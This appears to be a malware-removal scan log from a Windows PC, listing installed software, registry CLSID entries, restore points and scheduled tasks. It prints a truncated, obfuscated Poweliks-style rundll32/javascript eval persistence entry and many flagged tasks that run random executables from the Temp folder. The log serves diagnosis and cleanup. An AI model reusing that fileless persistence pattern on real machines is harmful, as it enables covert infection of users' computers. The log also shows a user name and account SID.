Apple Application Support (HKLM\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)

Apple Mobile Device Support (HKLM\...\{235EBB33-3DA1-46DF-AADE-9955123409CB}) (Version: 8.0.5.6 - Apple Inc.)

Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)

Banctec Service Agreement (HKLM\...\{42D68A86-DB1C-4256-B8C9-5D0D92919AF5}) (Version: 2.0.0 - Dell Inc.)

Battle.net (HKLM\...\Battle.net) (Version:  - Blizzard Entertainment)

Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)

Borderlands (HKLM\...\Steam App 8980) (Version:  - Gearbox Software)

Chantelise - Demo (HKLM\...\Steam App 70430) (Version:  - )

Choice Guard (Version: 1.2.87.0 - Microsoft Corporation) Hidden

Cisco EAP-FAST Module (HKLM\...\{415B2719-AD3A-4944-B404-C472DB6085B3}) (Version: 2.1.6 - Cisco Systems, Inc.)

Cisco LEAP Module (HKLM\...\{83770D14-21B9-44B3-8689-F7B523F94560}) (Version: 1.0.12 - Cisco Systems, Inc.)

Cisco PEAP Module (HKLM\...\{669C7BD8-DAA2-49B6-966C-F1E2AAE6B17E}) (Version: 1.0.13 - Cisco Systems, Inc.)

Curse (HKLM\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Curse)

Dell Dock (HKLM\...\{F6CB42B9-F033-4152-8813-FF11DA8E6A78}) (Version: 1.0.0 - Dell)

Dell Getting Started Guide (HKLM\...\{7DB9F1E5-9ACB-410D-A7DC-7A3D023CE045}) (Version: 1.00.0000 - Dell Inc.)

Dell Remote Access (HKLM\...\{F66A31D9-7831-4FBA-BA02-C411C0047CC5}) (Version: 1.0.0.0 - Dell Inc.)

Dell Support Center (Support Software) (HKLM\...\{E3BFEE55-39E2-4BE0-B966-89FE583822C1}) (Version: 2.2.08298 - Dell)

Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.2.115.201 - Alps Electric)

Dell Wireless WLAN Card Utility (HKLM\...\Broadcom 802.11 Application) (Version: 5.10.38.30 - Dell Inc.)

DELL0604 (Version: 1.0.0 - WildTangent) Hidden

DivX Setup (HKLM\...\DivX Setup) (Version: 2.6.1.24 - DivX, LLC)

Dual-Core Optimizer (HKLM\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD)

EDocs (HKLM\...\{6B7B6D4D-8F9B-4CB3-8CA4-BCA9CC4C1A22}) (Version:  - )

Evolve (HKLM\...\{670B1B49-9FD3-4827-9B41-471EFF580AA8}) (Version: 1.8.8 - Echobit, LLC)

Gmask 1.70 English (HKLM\...\Gmask 1.70 English) (Version:  - )

Google Toolbar for Internet Explorer (HKLM\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)

Google Toolbar for Internet Explorer (Version: 1.0.0 - Google Inc.) Hidden

Google Update Helper (Version: 1.3.25.5 - Google Inc.) Hidden

GoToAssist 8.0.0.514 (HKLM\...\GoToAssist) (Version:  - )

Graphical Analysis 3.4 (HKLM\...\{047B3D5A-3E67-429E-8A12-B204B6B31DF8}) (Version: 3.4 - Vernier Software & Technology)

Hearthstone (HKLM\...\Hearthstone) (Version:  - Blizzard Entertainment)

InstaCodecs (HKLM\...\InstaCodecs_is1) (Version: 1.0 - )

Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1994 - Intel Corporation)

Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)

iTunes (HKLM\...\{5D928931-D1D2-4A93-A82D-BF60D0E7CFA5}) (Version: 12.0.1.26 - Apple Inc.)

Java 7 Update 71 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)

Jazz Jackrabbit 2 (HKLM\...\Jazz Jackrabbit 2) (Version:  - )

Juniper Networks, Inc. Setup Client Activex Control (HKLM\...\Juniper_Setup_Client Activex Control) (Version: 2.1.1.1 - Juniper Networks, Inc.)

Junk Mail filter update (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden

KAG 0.95A (HKLM\...\King Arthur's Gold (Alpha)_is1) (Version:  - Michal Marcinkowski THD)

Katawa Shoujo (HKLM\...\Katawa Shoujo) (Version:  - )

Katawa Shoujo Act 1 (HKLM\...\Katawa Shoujo Act 1) (Version:  - )

League of Legends (HKLM\...\League of Legends 3.0.0) (Version: 3.0.0 - Riot Games)

League of Legends (Version: 3.0.0 - Riot Games) Hidden

LIMBO (HKLM\...\Steam App 48000) (Version:  - )

LINE (HKLM\...\LINE) (Version: 3.7.6.116 - LINE Corporation)

Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)

MapleStory (HKLM\...\MapleStory) (Version:  - )

McAfee AntiVirus (HKLM\...\MSC) (Version: 12.8.988 - McAfee, Inc.)

McAfee Virtual Technician (HKLM\...\McAfee Virtual Technician) (Version: 6.5.0.2101 - McAfee, Inc.)

Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)

Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)

Microsoft Age of Empires II (HKLM\...\Age of Empires 2.0) (Version:  - )

Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)

Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)

Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)

Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)

Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)

Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)

Microsoft Sync Framework Services Native v1.0 (x86) (HKLM\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)

Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)

Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft XNA Framework Redistributable 4.0 (HKLM\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)

MSVCRT (Version: 14.0.1468.721 - Microsoft) Hidden

Mumble 1.2.8 (HKLM\...\{A9DBD31A-A09F-4C7E-86D1-3B21C59000D1}) (Version: 1.2.8 - Thorvald Natvig)

Nexon Game Manager (HKLM\...\{EA2DB6E0-72C5-4ef9-A3A0-E6705F4A6A9E}) (Version:  - )

NVIDIA PhysX (HKLM\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation)

OGA Notifier 2.0.0048.0 (Version: 2.0.0048.0 - Microsoft Corporation) Hidden

Pando Media Booster (HKLM\...\{980A182F-E0A2-4A40-94C1-AE0C1235902E}) (Version: 2.3.6.0 - Pando Networks Inc.)

Peggle Deluxe (HKLM\...\Steam App 3480) (Version:  - PopCap Games, Inc.)

Pokemon Showdown (HKLM\...\Pokemon Showdown) (Version:  - "Pokemon Showdown")

Portal (HKLM\...\Steam App 400) (Version:  - Valve)

PowerDVD (HKLM\...\{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}) (Version: 8.1 - Dell)

Project64 1.6 (HKLM\...\{9559F7CA-5E34-4237-A2D9-D856464AD727}) (Version: 1.6 - Project64)

Psychonauts (HKLM\...\Steam App 3830) (Version:  - Double Fine Productions, Inc.)

QuickSet (HKLM\...\{C4972073-2BFE-475D-8441-564EA97DA161}) (Version: 9.2.11 - Dell Inc.)

QuickTime (HKLM\...\{C9E14402-3631-4182-B377-6B0DFB1C0339}) (Version: 7.70.80.34 - Apple Inc.)

Recettear: An Item Shop's Tale - Demo (HKLM\...\Steam App 70410) (Version:  - EasyGameStation)

Roxio Creator DE (HKLM\...\{09760D42-E223-42AD-8C3E-55B47D0DDAC3}) (Version: 10.1 - Roxio)

Shared C Run-time for x86 (Version: 10.0.0 - McAfee) Hidden

Skype™ 6.21 (HKLM\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.21.104 - Skype Technologies S.A.)

Spelling Dictionaries Support For Adobe Reader 9 (HKLM\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version: 9.0.0 - Adobe Systems Incorporated)

Star Wars Jedi Knight Jedi Academy (HKLM\...\{1EECBA68-8BE4-4076-94DF-E9ED206B1D21}) (Version:  - )

Steam (HKLM\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)

System Requirements Lab Detection (HKLM\...\{23C1EA28-BA75-469D-864C-9880D35AB582}) (Version: 2.2.1.0 - Husdawg, LLC)

TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.8.1 - TeamSpeak Systems GmbH)

Terraria (HKLM\...\Steam App 105600) (Version:  - Re-Logic)

The Elder Scrolls Online (HKLM\...\The Elder Scrolls Online) (Version: 1.0.0.0 - Zenimax Online Studios)

Unturned (HKLM\...\Steam App 304930) (Version:  - Nelson Sexton)

Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)

VC80CRTRedist - 8.0.50727.6195 (Version: 1.2.0 - DivX, Inc) Hidden

Vindictus (HKLM\...\Steam App 212160) (Version:  - Nexon)

VLC media player (HKLM\...\VLC media player) (Version: 2.1.5 - VideoLAN)

Voyetra Record Producer (HKLM\...\InstallShield_{28358FC7-703D-4D27-B791-B93C36650157}) (Version: 5.01.4100 - Voyetra Turtle Beach, Inc.)

Voyetra Record Producer (Version: 5.01.4100 - Voyetra Turtle Beach, Inc.) Hidden

Windows Live Essentials (HKLM\...\WinLiveSuite_Wave3) (Version: 14.0.8050.1202 - Microsoft Corporation)

Windows Live Sign-in Assistant (HKLM\...\{9422C8EA-B0C6-4197-B8FC-DC797658CA00}) (Version: 5.000.818.6 - Microsoft Corporation)

Windows Live Sync (HKLM\...\{FDD810CA-D5E3-40E9-AB7B-36440B0D41EF}) (Version: 14.0.8050.1202 - Microsoft Corporation)

Windows Live Upload Tool (HKLM\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)

WinRAR 4.00 (32-bit) (HKLM\...\WinRAR archiver) (Version: 4.00.0 - win.rar GmbH)

Xiph.Org Ogg Codecs 0.83.17220 32-bit (HKLM\...\Ogg Codecs) (Version: 0.83.17220 - Xiph.Org)

Xiph.Org Open Codecs 0.85.17777 (HKLM\...\Open Codecs) (Version: 0.85.17777 - Xiph.Org)

 

==================== Custom CLSID (selected items): ==========================

 

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

 

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{022105BD-948A-40C9-AB42-A3300DDF097F}\localserver32 -> C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe (Google Inc.)

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{035FBE31-3755-450A-A775-5E6BBD43D344}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.21.135\psuser.dll No File

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\psuser.dll (Google Inc.)

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{1c492e6a-2803-5ed7-83e1-1b1d4d41eb39}\InprocServer32 -> C:\Program Files\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll No File

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{22181302-A8A6-4F84-A541-E5CBFC70CC43}\localserver32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\GoogleUpdateOnDemand.exe (Google Inc.)

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{2F0E2680-9FF5-43C0-B76E-114A56E93598}\localserver32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\GoogleUpdateOnDemand.exe (Google Inc.)

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{31261F21-2B16-45EE-BEAB-07C4CFA18B65}\InprocServer32 -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.23.9\psuser.dll No File

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\InprocServer32 -> C:\Users\Tyler\AppData\LocalLow\Unity\WebPlayer\loader\UnityWebPluginAX.ocx (Unity Technologies ApS)

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{51F9E8EF-59D7-475B-A106-C7EA6F30C119}\localserver32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\GoogleUpdateOnDemand.exe (Google Inc.)

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{5C65F4B0-3651-4514-B207-D10CB699B14B}\localserver32 -> C:\Users\Tyler\AppData\Local\Google\Chrome\Application\38.0.2125.111\delegate_execute.exe (Google Inc.)

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{62A0D750-DED9-448C-B693-406B34BB0892}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.21.145\psuser.dll No File

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{634059C0-D264-4B2C-AE80-F73E48D33E5B}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.21.123\psuser.dll No File

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{6D7374DE-63AA-473C-8C02-60D9CDCD84C5}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.21.153\psuser.dll No File

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.24.15\psuser.dll No File

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{91EFB276-CEFE-48EC-BB3A-57795A7B4008}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.21.149\psuser.dll No File

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{A45426FB-E444-42B2-AA56-419F8FBEEC61}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.22.3\psuser.dll No File

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{A54D478D-4F70-4F72-9A74-17C9986E35AB}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.21.165\psuser.dll No File

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{C3101A8B-0EE1-4612-BFE9-41FFC1A3C19D}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{C442AC41-9200-4770-8CC0-7CDB4F245C55}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{E67BE843-BBBE-4484-95FB-05271AE86750}\localserver32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\GoogleUpdateOnDemand.exe (Google Inc.)

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.25.5\psuser.dll (Google Inc.)

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{EB06378B-ABB6-4B3C-9B40-D488DD8A6E93}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.22.5\psuser.dll No File

CustomCLSID: HKU\S-1-5-21-879967681-4271235005-1519339517-1000_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Tyler\AppData\Local\Google\Update\1.3.24.7\psuser.dll No File

 

==================== Restore Points  =========================

 

03-10-2014 00:14:48 Scheduled Checkpoint

04-10-2014 02:47:13 Device Driver Package Install: Apple, Inc. Universal Serial Bus controllers

05-10-2014 17:08:11 Scheduled Checkpoint

09-10-2014 21:19:18 Scheduled Checkpoint

16-10-2014 21:27:02 Installed Java 7 Update 71

17-10-2014 02:54:45 Installed System Requirements Lab Detection

17-10-2014 07:01:39 Windows Update

23-10-2014 23:24:10 Scheduled Checkpoint

01-11-2014 02:34:50 Scheduled Checkpoint

03-11-2014 23:36:57 Scheduled Checkpoint

09-11-2014 08:34:53 herdProtect before 20 removals

 

==================== Hosts content: ==========================

 

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

 

2006-11-02 05:23 - 2006-09-18 16:41 - 00000761 ____A C:\Windows\system32\Drivers\etc\hosts

127.0.0.1       localhost

::1             localhost

 

==================== Scheduled Tasks (whitelisted) =============

 

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

 

Task: {02F3A87A-548F-47BC-BD68-5A888092064A} - \723068096 No Task File <==== ATTENTION

Task: {03F376E0-F1CB-4296-B87B-4B309DB588CD} - System32\Tasks\winupd => C:\Users\Tyler\AppData\Local\Temp:winupd.exe

Task: {0AC14CC6-C57B-4E94-AEF6-C84CDCDD4568} - System32\Tasks\GoogleUpdateTaskMachineUA1cfec4f46187060 => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-20] (Google Inc.)

Task: {1097C274-B2F3-48B9-9A33-BB93A58AE7A4} - System32\Tasks\41e4db80 => C:\Users\Tyler\AppData\Local\Temp\\setup580511104.exe <==== ATTENTION

Task: {12E04DA3-AC3E-4876-97D2-2B5068500975} - System32\Tasks\2b8cf180 => C:\Users\Tyler\AppData\Local\Temp\\setup2968322816.exe <==== ATTENTION

Task: {1E9DA8F4-3624-4D36-9935-C638BF1BF2C8} - \1854721336 No Task File <==== ATTENTION

Task: {2086FFDA-25FD-41B6-8B15-B04E039FB5A7} - System32\Tasks\3db6c280 => C:\Users\Tyler\AppData\Local\Temp\\setup2671896960.exe <==== ATTENTION

Task: {22EDF7AF-765C-481D-B0F0-F35C8E5B42D2} - System32\Tasks\1282a400 => C:\Users\Tyler\AppData\Local\Temp\\setup2020529920.exe <==== ATTENTION

Task: {2D9354A7-0098-4C70-AF65-3E9ACDE16AD8} - \2105017024 No Task File <==== ATTENTION

Task: {347B25AD-737F-4CB2-9CE4-B7143274228A} - System32\Tasks\win402b40 => C:\Users\Tyler\AppData\Local\Temp\win402b40.dat <==== ATTENTION

Task: {3F4E49C7-1C2F-4FB9-B036-D5125C75F62D} - System32\Tasks\Launch BCM WLAN Tray => C:\Windows\system32\WLTRAY.EXE [2008-12-22] (Dell Inc.)

Task: {48ED1995-0CAB-4211-A9D0-4A431EA2D062} - System32\Tasks\dd91ed80 => C:\Users\Tyler\AppData\Local\Temp\\setup731568512.exe <==== ATTENTION

Task: {4A9850DC-9325-4F8E-9F8F-BC7A334C11CC} - \612777664 No Task File <==== ATTENTION

Task: {54659C83-9DFE-4ECB-AE9D-D6527B229EF3} - \2778588544 No Task File <==== ATTENTION

Task: {5581028F-00F2-4331-AF8D-49606E3588AA} - System32\Tasks\5c3cd980 => C:\Users\Tyler\AppData\Local\Temp\\setup2856699264.exe <==== ATTENTION

Task: {5B5DF183-F14E-4E77-945A-39A2D2863E06} - \3106137952 No Task File <==== ATTENTION

Task: {62BA65A3-F904-4AC4-86ED-9C2355F937E8} - \77464128 No Task File <==== ATTENTION

Task: {635409A9-D3ED-44BA-88AC-8261B1450358} - System32\Tasks\1e723ec0 => C:\Users\Tyler\AppData\Local\Temp\\setup2709505536.exe <==== ATTENTION

Task: {65A519A5-404C-4F00-8901-FBE3928E9616} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-20] (Google Inc.)

Task: {6A669327-4173-4D1D-B406-6AC69FAD66EB} - System32\Tasks\8728f2c0 => C:\Users\Tyler\AppData\Local\Temp\\setup3760815040.exe <==== ATTENTION

Task: {6F6E9732-E8BD-467A-8947-4D956FBFB026} - System32\Tasks\c584be80 => C:\Users\Tyler\AppData\Local\Temp\\setup378817920.exe <==== ATTENTION

Task: {784E7FC3-2476-4EBB-B997-81A1F8959E44} - System32\Tasks\14770480 => C:\Users\Tyler\AppData\Local\Temp\\setup1325249920.exe <==== ATTENTION

Task: {78894A2C-9761-42DF-9B27-7560BF67DA72} - System32\Tasks\3d62c280 => C:\Users\Tyler\AppData\Local\Temp\\setup2389856640.exe <==== ATTENTION

Task: {79F67B3A-4697-46A2-BED6-B71965760E83} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000Core => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe [2012-09-19] (Google Inc.)

Task: {7A37EF97-DB03-409A-AA13-EE2066C8CA16} - \1837831808 No Task File <==== ATTENTION

Task: {7AC62A27-75DB-4C4B-9D97-09C9CEFD1F9A} - System32\Tasks\a9ca0c80 => C:\Users\Tyler\AppData\Local\Temp\\setup3830496640.exe <==== ATTENTION

Task: {8576719E-EA86-405E-86DB-87A849BFF5C7} - System32\Tasks\p9pl5944863637826728850 => \\?\globalroot\Device\HarddiskVolume3\Users\Tyler\AppData\Local\Temp\p9pl5944863637826728850.tmp <==== ATTENTION

Task: {8E2D0CED-A382-4C75-AE93-C0A74561308A} - System32\Tasks\ec10ca40 => C:\Users\Tyler\AppData\Local\Temp\\setup802090624.exe <==== ATTENTION

Task: {8F2D83C7-454E-498B-AA2C-76F5345946AA} - System32\Tasks\59c9e100 => C:\Users\Tyler\AppData\Local\Temp\\setup3556369856.exe <==== ATTENTION

Task: {934728FC-EE47-4533-8858-A8E13EED00E9} - System32\Tasks\AdobeAAMUpdater-1.0-Tyler-PC-Tyler => C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2010-03-06] (Adobe Systems Incorporated)

Task: {960BD142-4858-4A58-A5B4-6941A9B56291} - \735723520 No Task File <==== ATTENTION

Task: {9CE86707-2679-4ED1-B2BC-521F4AED3520} - System32\Tasks\90bebf80 => C:\Users\Tyler\AppData\Local\Temp\\setup1903413632.exe <==== ATTENTION

Task: {9E17A182-5687-427B-B1EC-28EE0EEFAD54} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000UA1cfeb0948c7c370 => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe [2012-09-19] (Google Inc.)

Task: {A6AFE3FF-EBD9-4327-A603-C08004EDF913} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)

Task: {A8BB84DE-677F-48BE-9A35-D1D1A2A0AD5D} - System32\Tasks\GoogleUpdateTaskMachineCore1cf2ca2e648d290 => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-20] (Google Inc.)

Task: {A9462BA2-5504-4C3E-8B84-0D9A2F7FC854} - System32\Tasks\582b9f80 => C:\Users\Tyler\AppData\Local\Temp\\setup954247552.exe <==== ATTENTION

Task: {B6A9B53F-7B1E-460E-8B25-417D3CE85E46} - \4104635328 No Task File <==== ATTENTION

Task: {B90EC509-EFFD-479F-B674-1098EF69ADE3} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000UA => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe [2012-09-19] (Google Inc.)

Task: {BA07379C-921B-4AB1-8585-733D746B82DD} - \3975815936 No Task File <==== ATTENTION

Task: {BB542176-A526-4360-A650-B4A433AA62BA} - \3426028800 No Task File <==== ATTENTION

Task: {C090D641-39F5-4A04-88FD-0FF938662580} - System32\Tasks\win4036e0 => C:\Users\Tyler\AppData\Local\Temp\win4036e0.dat <==== ATTENTION

Task: {C15A3FCC-C99B-46B5-9D09-024F7268B652} - \3436031516 No Task File <==== ATTENTION

Task: {CCC2CDBA-04B8-4B4E-BB8E-2FB9747E7DEB} - System32\Tasks\a0168f00 => C:\Users\Tyler\AppData\Local\Temp\\setup2160826624.exe <==== ATTENTION

Task: {D5C774FE-AA3F-4944-BC4D-6DC2983A11AC} - \1067678144 No Task File <==== ATTENTION

Task: {DFDCAB67-7DAA-42D9-9555-A6C60AD5F35B} - \1015687112 No Task File <==== ATTENTION

Task: {EBC8DC2B-B1E1-4B3B-AD7B-6A54AC321E13} - System32\Tasks\p9pl388102792662700970 => \\?\globalroot\Device\HarddiskVolume3\Users\Tyler\AppData\Local\Temp\p9pl388102792662700970.tmp <==== ATTENTION

Task: {ECA6FEB7-4FF1-4A7F-8724-E8C80FD48DFB} - System32\Tasks\c52a4280 => C:\Users\Tyler\AppData\Local\Temp\\setup372887936.exe <==== ATTENTION

Task: {F054D8E5-C40B-40BF-991E-1BFD143B3D9E} - \193991460 No Task File <==== ATTENTION

Task: {FB20997B-71A1-4145-9D52-A9166159F737} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)

 

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

 

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1cf2ca2e648d290.job => C:\Program Files\Google\Update\GoogleUpdate.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1cfec4f46187060.job => C:\Program Files\Google\Update\GoogleUpdate.exe

